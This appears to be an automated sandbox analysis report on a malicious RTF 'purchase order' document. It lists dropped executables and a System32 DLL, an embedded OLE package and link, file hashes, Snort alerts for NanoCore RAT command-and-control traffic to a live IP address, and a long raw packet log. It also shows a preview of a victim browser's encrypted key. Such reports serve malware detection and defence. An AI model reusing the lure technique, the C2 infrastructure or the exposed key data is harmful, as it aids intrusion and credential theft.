                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"84.0.4147.89"},"easy_unlock":{"device_id":"f691bb0f-1b4f-4339-aef5-321b65f13447"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.595529173769173e+12,"network":1.595503998e+12,"ticks":494811744.0,"uncertainty":4224807.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADCJQEpL4peQLs/tCx05ts1AAAAAAIAAAAAABBmAAAAAQAAIAAAAHMdBSm688AB9E4ujGBlc8b12w9pH8Ho0MG5KX0s9TvsAAAAAA6AAAAAAgAAIAAAAKp70FMSZVCDUsFN1iNo5k0cdS+uI3XobvqN11pz11FbMAAAAHEgEYBv3dbmfqLRp8KY9FTYBCEdPLIJnBuQSIy6PW6ieb+TQlX0tlf+joBO06Pyo0AAAADT82DjaNvFLY7T0RywXTGepumesXXBFeM5MLg7ZlErGegSazITBqJVemjLdeT3R2c6H7dl+tlEXxt1m8SJWLUl"},"policy":{"last_statistics_update":"13240002771769952"},"profile":{"info_cache":{"Default":{"active_time":1595529172.199256,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_26","background_apps":false,"
                                C:\Users\user\Desktop\~$W PO1100372954 -.doc
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4311600611816426
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                Malicious:false
                                Reputation:unknown
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...
                                C:\Windows\System32\rfxvmt.dll
                                Process:C:\ProgramData\images.exe
                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):37376
                                Entropy (8bit):5.7181012847214445
                                Encrypted:false
                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                Malicious:false
                                Antivirus:
                                 • Antivirus: Metadefender, Detection: 0%
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:Rich Text Format data, unknown version
                                Entropy (8bit):3.1682008800082904
                                TrID:
                                • Rich Text Format (5005/1) 55.56%
                                • Rich Text Format (4004/1) 44.44%
                                File name:NEW PO1100372954 -.doc
                                File size:234750
                                MD5:afe48e30fc3f12c2b6ad7d19ae1fff8e
                                SHA1:2ded99867d8b3e9499b10743ae732efec19ccc8e
                                SHA256:ecef57afce8a7d5eed2080401da0ce36d67c2493cf1385b432a6bf0a65f6e521
                                SHA512:9a2bcef0c2f34c68fab71898cdebf2deb8c937fb87b5195fc99e5f4e6bbc156d6549a6fb0535ba4602b95ff1e7bff4404b30ce695c7498be6e21d48a71f2bb58
                                SSDEEP:1536:itW7qA4b64DJ/b6lP1JsvggNNzoBxqM8RLlypLBCy/ndzFz76mAg5eeVhMDw5wfv:itW7qA4b64ggaeG/ndzFtr5RDAw5wfv
                                File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                File Icon

                                Icon Hash:e4eea2aaa4b4b4a4

                                Static RTF Info

                                Objects

                                 Id  Start      Format ID  Format    Classname  Datasize  Filename            Sourcepath                      Temppath                        Exploit
                                 0   00000961h  2          embedded  package    20578     abdtfhgXgdghgh.ScT  C:\jsdsTggf\abdtfhgXGdghgh.ScT  C:\CbkepaDw\abdtfhghgdghgh.ScT  no
                                 1   0000B188h  2          embedded  OLE2LInk   2560      -                   -                               -                               no

                                Network Behavior

                                Snort IDS Alerts

                                 Timestamp                 Protocol  SID      Message                             Source Port  Dest Port  Source IP     Dest IP
                                 08/02/21-11:00:55.449858  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49170        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:04.085356  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49171        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:10.279735  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49172        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:11.005994  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49172        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:15.859665  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49173        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:26.222099  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49174        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:26.832941  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49174        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:31.194297  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49175        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:36.418179  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49176        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:41.681580  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49177        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:52.872032  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49178        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:58.316930  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49179        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:01:58.959256  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49179        8234       192.168.2.22  203.159.80.186
                                 08/02/21-11:02:03.607658  TCP       2025019  ET TROJAN Possible NanoCore C2 60B  49180        8234       192.168.2.22  203.159.80.186

                                Network Port Distribution

                                TCP Packets

                                 Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                                 Aug 2, 2021 10:59:54.181540012 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.219240904 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.219322920 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.220050097 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.251251936 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.251281023 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.251302004 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.251323938 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.251357079 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.251631021 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.282464981 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.282495975 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.282511950 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.282535076 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.282556057 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.282576084 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.282597065 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.282608986 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.282615900 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.282643080 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.282646894 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.282649994 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.311568975 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.311600924 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.311621904 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.311642885 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.311640978 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.311666965 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.311675072 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.311680079 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.311682940 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.311690092 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.311697006 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.311709881 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.311727047 CEST  49165        80         192.168.2.22    203.159.80.186
                                 Aug 2, 2021 10:59:54.311731100 CEST  80           49165      203.159.80.186  192.168.2.22
                                 Aug 2, 2021 10:59:54.311738014 CEST  49165        80         192.168.2.22    203.159.80.186
                                Aug 2, 2021 10:59:54.311753035 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311774015 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311764956 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311790943 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311794996 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311800003 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311817884 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311834097 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311841011 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311841965 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311863899 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311875105 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311886072 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311901093 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311906099 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311908960 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311945915 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.313561916 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341093063 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341123104 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341144085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341165066 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341166973 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341186047 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341198921 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341202974 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341207027 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341212988 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341232061 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341247082 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341253042 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341264963 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341274977 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341289997 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341295004 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341310024 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341315985 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341325998 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341337919 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341353893 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341358900 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341358900 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341381073 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341389894 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341403961 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341408014 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341425896 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341435909 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341447115 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341456890 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341468096 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341471910 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341489077 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341497898 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341511011 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341520071 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341531992 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341538906 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341552973 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341561079 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341577053 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341583967 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341598988 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341605902 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341619968 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341628075 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341640949 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341650009 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341661930 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341670036 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341681957 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341684103 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341702938 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341711998 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341727018 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341739893 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341748953 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341749907 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341773033 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341780901 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341801882 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.343333006 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370685101 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370712042 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370733023 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370744944 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370753050 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370774031 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370776892 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370779991 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370781898 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370794058 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370798111 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370814085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370824099 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370835066 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370837927 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370858908 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370867968 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370878935 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370893955 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370898962 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370906115 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370920897 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370928049 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370942116 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370949030 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370964050 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370970964 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370985031 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370991945 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371009111 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371016979 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371032000 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371040106 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371052027 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371061087 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371073008 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371078014 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371093988 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371102095 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371125937 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371134043 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371156931 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371164083 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371179104 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371185064 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371210098 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371301889 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371324062 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371336937 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371347904 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371359110 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371380091 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371388912 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371400118 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371411085 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371422052 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371422052 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371443987 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371452093 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371464968 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371474028 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371485949 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371494055 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371505976 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371515036 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371529102 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371536970 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371551037 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371556997 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371571064 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371581078 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371592045 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371592999 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371613026 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371622086 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371634007 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371643066 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371654034 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371656895 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371675014 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371684074 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371697903 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371697903 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371718884 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371727943 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371740103 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371747971 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371762037 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371767998 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371782064 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371797085 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371803045 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371810913 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371824026 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371831894 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371845007 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371854067 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371874094 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.372059107 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.399518967 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399560928 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399590015 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399619102 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399647951 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399672985 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.399676085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399705887 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.399709940 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.399712086 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400161982 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400204897 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400587082 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400619984 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400635958 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400650024 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400679111 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400684118 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400684118 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400715113 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400733948 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400746107 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400743961 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400777102 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400782108 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400806904 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400820017 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400839090 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400847912 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400870085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400878906 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400904894 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400907993 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400938988 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400952101 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400970936 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400974989 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401002884 CEST8049165203.159.80.186192.168.2.22
